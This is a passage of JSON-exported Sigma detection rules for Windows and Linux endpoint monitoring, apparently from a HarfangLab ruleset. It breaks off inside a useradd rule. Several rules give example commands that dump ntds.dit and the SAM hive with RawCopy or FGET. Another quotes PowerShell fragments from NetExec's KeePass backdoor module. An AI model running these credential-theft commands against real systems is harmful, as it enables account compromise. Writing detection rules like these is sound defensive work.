{
"id": "003481a2-e45e-44fd-9433-b13492669c31",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.076504Z",
"creation_date": "2026-03-23T11:45:34.076506Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.076511Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://www.ired.team/offensive-security/credential-access-and-credential-dumping/t1174-password-filter-dll",
"https://attack.mitre.org/techniques/T1547/002/"
],
"name": "t1547_002_persistence_lsa_authentication_package.yml",
"content": "title: LSA Authentication Package Installed\nid: 003481a2-e45e-44fd-9433-b13492669c31\ndescription: |\n Detects the installation of a new authentication package via a registry modification.\n The LSA (Local Security Authority) is a critical Windows component responsible for managing security policies and authentication.\n Attackers may install these packages to gain elevated privileges or establish persistence.\n It is recommended to investigate the source of the configuration change, review the permissions and ownership of the affected LSA settings, and verify the legitimacy of the modification.\n If the change cannot be attributed to a legitimate process, consider rolling back the configuration.\nreferences:\n - https://www.ired.team/offensive-security/credential-access-and-credential-dumping/t1174-password-filter-dll\n - https://attack.mitre.org/techniques/T1547/002/\ndate: 2020/09/22\nmodified: 2025/05/05\nauthor: HarfangLab\ntags:\n - attack.persistence\n - attack.t1547.002\n - attack.t1112\n - classification.Windows.Source.Registry\n - classification.Windows.Behavior.LSASSAccess\n - classification.Windows.Behavior.CredentialAccess\n - classification.Windows.Behavior.PrivilegeEscalation\n - classification.Windows.Behavior.Persistence\nlogsource:\n product: windows\n category: registry_event\ndetection:\n selection:\n TargetObject:\n - 'HKLM\\System\\CurrentControlSet\\Control\\Lsa\\Authentication Packages'\n - 'HKLM\\System\\CurrentControlSet\\Control\\Lsa\\OSConfig\\Authentication Packages'\n\n filter_empty:\n Details: '(Empty)'\n\n exclusion_malwarebytes:\n Image: '?:\\Program Files\\Malwarebytes\\Anti-Malware\\MBAMService.exe'\n\n exclusion_scecli:\n EventType: SetValue\n TargetObject: 'HKLM\\System\\CurrentControlSet\\Control\\Lsa\\Authentication Packages'\n Details: 'scecli'\n\n exclusion_msv10:\n EventType: SetValue\n TargetObject: 'HKLM\\System\\CurrentControlSet\\Control\\Lsa\\Authentication Packages'\n Details: 'msv1_0' # default value\n\n exclusion_known_fp:\n Details:\n - 'msv1_0'\n - 'msv1_0;sshdpinauthlsa' # C:\\WINDOWS\\system32\\SshdPinAuthLsa.dll, DLL from microsoft\n - 'msv1_0;ZenV1_0' # Novell ZENworks\n - 'msv1_0;nxlsa' # NoMachine S.a.r.l.\n - 'msv1_0;BvLsaEx' # BvSshServer-Inst.exe\n - 'msv1_0;teleport' # teleport-windows-auth-setup - Teleport RMM - https://goteleport.com/download/?product=connect&os=windows\n - 'msv1_0;CSALsubauth' # https://www.authlite.com/\n - 'msv1_0;wvauth' # Wave Systems Corp.\n - 'msv1_0;?:\\Program Files (x86)\\ScreenConnect Client (????????????????)\\ScreenConnect.WindowsAuthenticationPackage.dll'\n - 'msv1_0;?:\\Program Files (x86)\\ScreenConnect Client (????????????????)\\ScreenConnect.WindowsAuthenticationPackage.dll;?:\\Program Files (x86)\\ScreenConnect Client (????????????????)\\ScreenConnect.WindowsAuthenticationPackage.dll'\n - 'msv1_0;SshdPinAuthLsa;?:\\Program Files (x86)\\ScreenConnect Client (????????????????)\\ScreenConnect.WindowsAuthenticationPackage.dll'\n - 'msv1_0;SshdPinAuthLsa;?:\\Program Files (x86)\\ScreenConnect Client (????????????????)\\ScreenConnect.WindowsAuthenticationPackage.dll;?:\\Program Files (x86)\\ScreenConnect Client (????????????????)\\ScreenConnect.WindowsAuthenticationPackage.dll'\n\n condition: selection and not 1 of filter_* and not 1 of exclusion_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "003481a2-e45e-44fd-9433-b13492669c31",
"rule_name": "LSA Authentication Package Installed",
"rule_description": "Detects the installation of a new authentication package via a registry modification.\nThe LSA (Local Security Authority) is a critical Windows component responsible for managing security policies and authentication.\nAttackers may install these packages to gain elevated privileges or establish persistence.\nIt is recommended to investigate the source of the configuration change, review the permissions and ownership of the affected LSA settings, and verify the legitimacy of the modification.\nIf the change cannot be attributed to a legitimate process, consider rolling back the configuration.\n",
"rule_creation_date": "2020-09-22",
"rule_modified_date": "2025-05-05",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.persistence"
],
"rule_technique_tags": [
"attack.t1112",
"attack.t1547.002"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "006ebafe-6e79-4642-a76f-5073a4cc1bc5",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.098649Z",
"creation_date": "2026-03-23T11:45:34.098651Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.098656Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://www.wietzebeukema.nl/blog/hijacking-dlls-in-windows",
"https://github.com/xforcered/WFH",
"https://redcanary.com/blog/hijack-my-hijack-my-hijack-my-dll/",
"https://attack.mitre.org/techniques/T1574/001/"
],
"name": "t1574_001_dll_hijacking_dnscacheugc.yml",
"content": "title: DLL Hijacking via dnscacheugc.exe\nid: 006ebafe-6e79-4642-a76f-5073a4cc1bc5\ndescription: |\n Detects potential Windows DLL Hijacking via dnscacheugc.exe.\n DLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\n Attackers used this technique by copying a legitimate Windows-signed executable from System32 or SysWOW64 to a non-standard directory and planting the malicious DLL within the same folder.\n It is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\nreferences:\n - https://www.wietzebeukema.nl/blog/hijacking-dlls-in-windows\n - https://github.com/xforcered/WFH\n - https://redcanary.com/blog/hijack-my-hijack-my-hijack-my-dll/\n - https://attack.mitre.org/techniques/T1574/001/\ndate: 2021/12/10\nmodified: 2025/07/11\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.persistence\n - attack.privilege_escalation\n - attack.t1574.001\n - classification.Windows.Source.LibraryLoaded\n - classification.Windows.Behavior.DLLHijacking\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n product: windows\n category: library_event\ndetection:\n selection:\n ProcessOriginalFileName: 'dnscacheugc.exe'\n ProcessSignature: 'Microsoft Windows'\n ImageLoaded|endswith:\n - '\\dbgcore.DLL'\n - '\\dbghelp.dll'\n - '\\IPHLPAPI.DLL'\n - '\\wdscore.dll'\n filter_legitimate_image:\n Image|startswith:\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\WinSxS\\'\n filter_legitimate_imageloaded:\n ImageLoaded|startswith:\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\WinSxS\\'\n filter_signature_imageloaded:\n Signed: 'true'\n Signature: 'Microsoft Windows'\n condition: selection and not 1 of filter_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "006ebafe-6e79-4642-a76f-5073a4cc1bc5",
"rule_name": "DLL Hijacking via dnscacheugc.exe",
"rule_description": "Detects potential Windows DLL Hijacking via dnscacheugc.exe.\nDLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\nAttackers used this technique by copying a legitimate Windows-signed executable from System32 or SysWOW64 to a non-standard directory and planting the malicious DLL within the same folder.\nIt is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\n",
"rule_creation_date": "2021-12-10",
"rule_modified_date": "2025-07-11",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion",
"attack.persistence",
"attack.privilege_escalation"
],
"rule_technique_tags": [
"attack.t1574.001"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "0070bcf5-0b6e-40f9-9b07-baad4a18cf84",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "medium",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.627344Z",
"creation_date": "2026-03-23T11:45:34.627346Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.627350Z",
"rule_level": "medium",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://github.com/jschicht/RawCopy",
"http://blog.opensecurityresearch.com/2011/10/how-to-acquire-locked-files-from.html",
"https://attack.mitre.org/techniques/T1006/"
],
"name": "t1006_raw_access_files.yml",
"content": "title: Files Accessed via Raw Device Access\nid: 0070bcf5-0b6e-40f9-9b07-baad4a18cf84\ndescription: |\n Detects raw access to files through tools like RawCopy or FGET.\n Attackers can use raw access to dump files, evade detection mechanisms and bypass file locks.\n It is recommended to investigate the command-line arguments to check which file was accessed and to analyze the parent process for suspicious activities.\nreferences:\n - https://github.com/jschicht/RawCopy\n - http://blog.opensecurityresearch.com/2011/10/how-to-acquire-locked-files-from.html\n - https://attack.mitre.org/techniques/T1006/\ndate: 2022/10/19\nmodified: 2026/02/11\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.t1006\n - classification.Windows.Source.ProcessCreation\n - classification.Windows.Tool.RawCopy\n - classification.Windows.Tool.FGET\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n category: process_creation\n product: windows\ndetection:\n # RawCopy.exe /FileNamePath:C:\\Windows\\NTDS\\ntds.dit /OutputPath:C:\\Windows\\Temp\\ntds.dit\n selection_rawcopy:\n LegalCopyright: 'Joakim Schicht'\n Description: 'Copy files from NTFS volumes by using low level disk access'\n CommandLine|contains: 'FileNamePath'\n\n # FGET.exe -extract C:\\Windows\\System32\\config\\SAM C:\\Windows\\Temp\\out.sam\n selection_fget:\n # Signed by HBGary, Inc\n # The certificate was explicitly revoked by its issuer\n Imphash: '72B17395940FD0266D2CBBF8EB32CF3C'\n CommandLine|contains: 'extract'\n\n # This is handled by the rule aaf113bc-6b63-46d3-919a-9b2a105bcd5f\n filter_sensitive_files:\n CommandLine|contains:\n - '\\Windows\\NTDS\\NTDS.dit'\n - '\\Windows\\System32\\config\\SAM'\n - '\\Windows\\System32\\config\\SECURITY'\n - '\\Windows\\System32\\config\\SYSTEM'\n\n exclusion_bmc:\n Ancestors|endswith: '?:\\Program Files\\BMC Software\\BladeLogic\\RSC\\RSCDsvc.exe|?:\\Windows\\System32\\services.exe|?:\\Windows\\System32\\wininit.exe'\n\n condition: 1 of selection_* and not 1 of filter_* and not 1 of exclusion_*\nlevel: medium\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "0070bcf5-0b6e-40f9-9b07-baad4a18cf84",
"rule_name": "Files Accessed via Raw Device Access",
"rule_description": "Detects raw access to files through tools like RawCopy or FGET.\nAttackers can use raw access to dump files, evade detection mechanisms and bypass file locks.\nIt is recommended to investigate the command-line arguments to check which file was accessed and to analyze the parent process for suspicious activities.\n",
"rule_creation_date": "2022-10-19",
"rule_modified_date": "2026-02-11",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion"
],
"rule_technique_tags": [
"attack.t1006"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "008189c4-a1fb-4a50-86ed-a178011f9cc2",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.077824Z",
"creation_date": "2026-03-23T11:45:34.077826Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.077830Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://pentestlab.blog/2017/06/09/uac-bypass-sdclt/",
"https://attack.mitre.org/techniques/T1548/002/"
],
"name": "t1548_002_post_uac_bypass_sdclt.yml",
"content": "title: UAC Bypass Executed via sdclt\nid: 008189c4-a1fb-4a50-86ed-a178011f9cc2\ndescription: |\n Detects an unusual process being spawned by sdclt.exe.\n This action is probably the result of a UAC bypass attempt, prepared by setting specific values in the registry.\n Adversaries may bypass UAC mechanisms to elevate process privileges on a system to perform a task under administrator-level permissions.\n It is recommended to investigate the detected process and its execution context to determine its legitimacy.\nreferences:\n - https://pentestlab.blog/2017/06/09/uac-bypass-sdclt/\n - https://attack.mitre.org/techniques/T1548/002/\ndate: 2020/10/12\nmodified: 2025/02/05\nauthor: HarfangLab\ntags:\n - attack.privilege_escalation\n - attack.t1548.002\n - classification.Windows.Source.ProcessCreation\n - classification.Windows.Behavior.UACBypass\n - classification.Windows.Behavior.Hijacking\n - classification.Windows.Behavior.PrivilegeEscalation\nlogsource:\n category: process_creation\n product: windows\ndetection:\n selection:\n ParentImage|endswith: '\\sdclt.exe'\n\n filter_common:\n Image:\n - '?:\\Windows\\System32\\sdclt.exe'\n - '?:\\Windows\\System32\\control.exe'\n - '?:\\Windows\\System32\\recdisc.exe'\n\n condition: selection and not 1 of filter_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "008189c4-a1fb-4a50-86ed-a178011f9cc2",
"rule_name": "UAC Bypass Executed via sdclt",
"rule_description": "Detects an unusual process being spawned by sdclt.exe.\nThis action is probably the result of a UAC bypass attempt, prepared by setting specific values in the registry.\nAdversaries may bypass UAC mechanisms to elevate process privileges on a system to perform a task under administrator-level permissions.\nIt is recommended to investigate the detected process and its execution context to determine its legitimacy.\n",
"rule_creation_date": "2020-10-12",
"rule_modified_date": "2025-02-05",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.privilege_escalation"
],
"rule_technique_tags": [
"attack.t1548.002"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "00a9c87a-2497-4d37-878f-7cb8f3560972",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "critical",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.091095Z",
"creation_date": "2026-03-23T11:45:34.091097Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.091102Z",
"rule_level": "critical",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://github.com/Pennyw0rth/NetExec/blob/1af282888cd514cf9b4a08ff7caeb26c64625d90/nxc/data/keepass_trigger_module/AddKeePassTrigger.ps1",
"https://attack.mitre.org/techniques/T1555/005/",
"https://attack.mitre.org/techniques/T1059/001/"
],
"name": "t1555_005_netexec_keepass.yml",
"content": "title: KeePass Backdoored via NetExec\nid: 00a9c87a-2497-4d37-878f-7cb8f3560972\ndescription: |\n Detects a dump of a KeePass database made using the NetExec tools.\n NetExec is a tool intended to ease lateral movement, internal recon and credential gathering actions.\n It is recommended to investigate actions made by the child process and identify the source of the remote connection using authentication logs.\nreferences:\n - https://github.com/Pennyw0rth/NetExec/blob/1af282888cd514cf9b4a08ff7caeb26c64625d90/nxc/data/keepass_trigger_module/AddKeePassTrigger.ps1\n - https://attack.mitre.org/techniques/T1555/005/\n - https://attack.mitre.org/techniques/T1059/001/\ndate: 2024/07/23\nmodified: 2025/01/15\nauthor: HarfangLab\ntags:\n - attack.credential_access\n - attack.t1555.005\n - attack.execution\n - attack.t1059.001\n - classification.Windows.Source.PowerShellEvent\n - classification.Windows.HackTool.NetExec\n - classification.Windows.Behavior.CredentialAccess\n - classification.Windows.Behavior.Exfiltration\nlogsource:\n category: powershell_event\n product: windows\ndetection:\n selection_add:\n PowershellCommand|contains|all:\n - '$Null = $KeePassXML.Configuration.Application.TriggerSystem.Triggers.AppendChild($KeePassXML.ImportNode($TriggerXML.Trigger, $True))'\n - \"$Null = $KeePassXML.Configuration.Application.TriggerSystem.ReplaceChild($Triggers, $KeePassXML.Configuration.Application.TriggerSystem.SelectSingleNode('Triggers'))\"\n - 'bES7XfGLTA2IzmXm6a0pig=='\n - 'D5prW87VRr65NO2xP5RIIg=='\n selection_remove:\n PowershellCommand|contains|all:\n - '$KeePassXML.Configuration.Application.TriggerSystem.Triggers.RemoveChild($Child)'\n - '$Children = $KeePassXML.Configuration.Application.TriggerSystem.Triggers | ForEach-Object {$_.Trigger} | Where-Object {$_.Name -like $TriggerName}'\n - \"if($KeePassXMLPath -and ($KeePassXMLPath -match '.\\\\.xml$') -and (Test-Path -Path $KeePassXMLPath) ) {\"\n selection_restart:\n PowershellCommand|contains|all:\n - \"if($KeePassXMLPath -and ($KeePassXMLPath -match '.\\\\.xml$') -and (Test-Path -Path $KeePassXMLPath) ) {\"\n - 'taskkill /F /T /IM keepass.exe /FI \"USERNAME eq $KeePassUser\"'\n condition: 1 of selection_*\nlevel: critical\nconfidence: strong",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "00a9c87a-2497-4d37-878f-7cb8f3560972",
"rule_name": "KeePass Backdoored via NetExec",
"rule_description": "Detects a dump of a KeePass database made using the NetExec tools.\nNetExec is a tool intended to ease lateral movement, internal recon and credential gathering actions.\nIt is recommended to investigate actions made by the child process and identify the source of the remote connection using authentication logs.\n",
"rule_creation_date": "2024-07-23",
"rule_modified_date": "2025-01-15",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.credential_access",
"attack.execution"
],
"rule_technique_tags": [
"attack.t1059.001",
"attack.t1555.005"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "00d0b7b5-b0af-4d67-8658-5a08f0acf307",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.618852Z",
"creation_date": "2026-03-23T11:45:34.618854Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.618858Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://github.com/xforcered/WFH",
"https://securityintelligence.com/posts/windows-features-dll-sideloading/",
"https://attack.mitre.org/techniques/T1574/001/"
],
"name": "t1574_001_dll_hijacking_infdefaultinstall.yml",
"content": "title: DLL Hijacking via InfDefaultInstall.exe\nid: 00d0b7b5-b0af-4d67-8658-5a08f0acf307\ndescription: |\n Detects potential Windows DLL Hijacking via InfDefaultInstall.exe.\n DLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\n Attackers used this technique by copying a legitimate executable and planting the malicious DLL within the same folder.\n It is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\nreferences:\n - https://github.com/xforcered/WFH\n - https://securityintelligence.com/posts/windows-features-dll-sideloading/\n - https://attack.mitre.org/techniques/T1574/001/\ndate: 2022/09/15\nmodified: 2025/07/11\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.persistence\n - attack.privilege_escalation\n - attack.t1574.001\n - classification.Windows.Source.LibraryLoaded\n - classification.Windows.Behavior.DLLHijacking\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n product: windows\n category: library_event\ndetection:\n selection:\n ProcessOriginalFileName: 'InfDefaultInstall.EXE'\n ProcessSignature: 'Microsoft Windows'\n ImageLoaded|endswith:\n - '\\drvstore.dll'\n - '\\newdev.dll'\n filter_legitimate_image:\n Image|startswith:\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\WinSxS\\'\n filter_legitimate_imageloaded:\n ImageLoaded|startswith:\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\WinSxS\\'\n filter_signature_imageloaded:\n Signed: 'true'\n Signature: 'Microsoft Windows'\n condition: selection and not 1 of filter_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "00d0b7b5-b0af-4d67-8658-5a08f0acf307",
"rule_name": "DLL Hijacking via InfDefaultInstall.exe",
"rule_description": "Detects potential Windows DLL Hijacking via InfDefaultInstall.exe.\nDLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\nAttackers used this technique by copying a legitimate executable and planting the malicious DLL within the same folder.\nIt is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\n",
"rule_creation_date": "2022-09-15",
"rule_modified_date": "2025-07-11",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion",
"attack.persistence",
"attack.privilege_escalation"
],
"rule_technique_tags": [
"attack.t1574.001"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "00ecf213-801a-4ee0-b19d-fbe12001d4a3",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "low",
"rule_effective_confidence": "weak",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-24T07:14:08.719555Z",
"creation_date": "2026-03-23T11:45:34.612526Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.612534Z",
"rule_level": "low",
"rule_confidence": "weak",
"rule_confidence_override": null,
"references": [
"https://research.checkpoint.com/2022/apt35-exploits-log4j-vulnerability-to-distribute-new-modular-powershell-toolkit/",
"https://attack.mitre.org/techniques/T1136/001/"
],
"name": "t1136_001_useradd_linux.yml",
"content": "title: User Created via useradd\nid: 00ecf213-801a-4ee0-b19d-fbe12001d4a3\ndescription: |\n Detects an attempt to create a new user using the useradd utility.\n Adversaries may create new users to hide their activity or achieve persistence.\n It is recommended to investigate whether the process has legitimate reasons to create a user as well as to look for possible suspicious activities on the host.\nreferences:\n - https://research.checkpoint.com/2022/apt35-exploits-log4j-vulnerability-to-distribute-new-modular-powershell-toolkit/\n - https://attack.mitre.org/techniques/T1136/001/\ndate: 2023/01/03\nmodified: 2026/03/23\nauthor: HarfangLab\ntags:\n - attack.persistence\n - attack.t1136.001\n - classification.Linux.Source.ProcessCreation\n - classification.Linux.Behavior.AccountManipulation\n - classification.Linux.Behavior.Persistence\nlogsource:\n category: process_creation\n product: linux\ndetection:\n selection:\n Image|endswith: '/useradd'\n exclusion_dpkg:\n - ProcessImage: '/usr/bin/dpkg'\n - ProcessParentImage: '/usr/bin/dpkg'\n - ProcessGrandparentImage: '/usr/bin/dpkg'\n exclusion_dpkg_cmds_bin:\n - ProcessCommandLine|contains: '/usr/bin/dpkg-'\n - ProcessParentCommandLine|contains: '/usr/bin/dpkg-'\n - ProcessGrandparentCommandLine|contains: '/usr/bin/dpkg-'\n exclusion_dpkg_cmds_sbin:\n - ProcessCommandLine|contains: '/usr/sbin/dpkg-'\n - ProcessParentCommandLine|contains: '/usr/sbin/dpkg-'\n - ProcessGrandparentCommandLine|contains: '/usr/sbin/dpkg-'\n exclusion_apt:\n - ProcessImage: '/usr/bin/apt'\n - ProcessParentImage: '/usr/bin/apt'\n - ProcessGrandparentImage: '/usr/bin/apt'\n exclusion_yum:\n - ProcessCommandLine|startswith:\n - '/usr/bin/python* /bin/yum '\n - '/usr/bin/python* /usr/bin/yum '\n - '/usr/bin/python* /usr/sbin/yum-cron'\n - '/usr/libexec/platform-python /bin/yum '\n - '/usr/libexec/platform-python /usr/bin/yum '\n - '/usr/bin/python -Estt /usr/local/psa/bin/yum_install ' # Plesk'\n - ProcessParentCommandLine|startswith:\n - '/usr/bin/python* /bin/yum '\n - '/usr/bin/python* /usr/bin/yum '\n - '/usr/bin/python* /usr/sbin/yum-cron'\n - '/usr/libexec/platform-python /bin/yum '\n - '/usr/libexec/platform-python /usr/bin/yum '\n - ProcessGrandparentCommandLine|startswith:\n - '/usr/bin/python* /bin/yum '\n - '/usr/bin/python* /usr/bin/yum '\n - '/usr/bin/python* /usr/sbin/yum-cron'\n - '/usr/libexec/platform-python /bin/yum '\n - '/usr/libexec/platform-python /usr/bin/yum '\n exclusion_rpm:\n - ProcessParentCommandLine|startswith: '/bin/sh /var/tmp/rpm-tmp.'\n - ProcessGrandparentCommandLine|startswith: '/bin/sh /var/tmp/rpm-tmp.'\n\n exclusion_debconf:\n - ProcessCommandLine|contains: '/usr/bin/debconf'\n - ProcessParentCommandLine|contains: '/usr/bin/debconf'\n - ProcessGrandparentCommandLine|contains: '/usr/bin/debconf'\n exclusion_dpkg_postinstall:\n - ProcessCommandLine|contains: '/var/lib/dpkg/info/*.postinst configure'\n - ProcessParentCommandLine|contains: '/var/lib/dpkg/info/*.postinst configure'\n - ProcessGrandparentCommandLine|contains: '/var/lib/dpkg/info/*.postinst configure'\n\n # This command is different on debian distros\n exclusion_nxlog_redhat:\n ProcessCommandLine: 'useradd -r -g nxlog -d /var/spool/nxlog -s /sbin/nologin -c user for the nxlog log managment tool nxlog'\n\n exclusion_ossec:\n ProcessParentImage: '/var/ossec/bin/wazuh-modulesd'\n\n exclusion_puppet:\n ProcessParentImage: '/opt/puppetlabs/puppet/bin/ruby'\n\n exclusion_aws:\n ProcessCommandLine: '/bin/bash /var/lib/cloud/instance/scripts/part-001'\n\n exclusion_template_ansible:\n - ProcessCommandLine|contains:\n - '(mitogen:*@*:*)'\n - 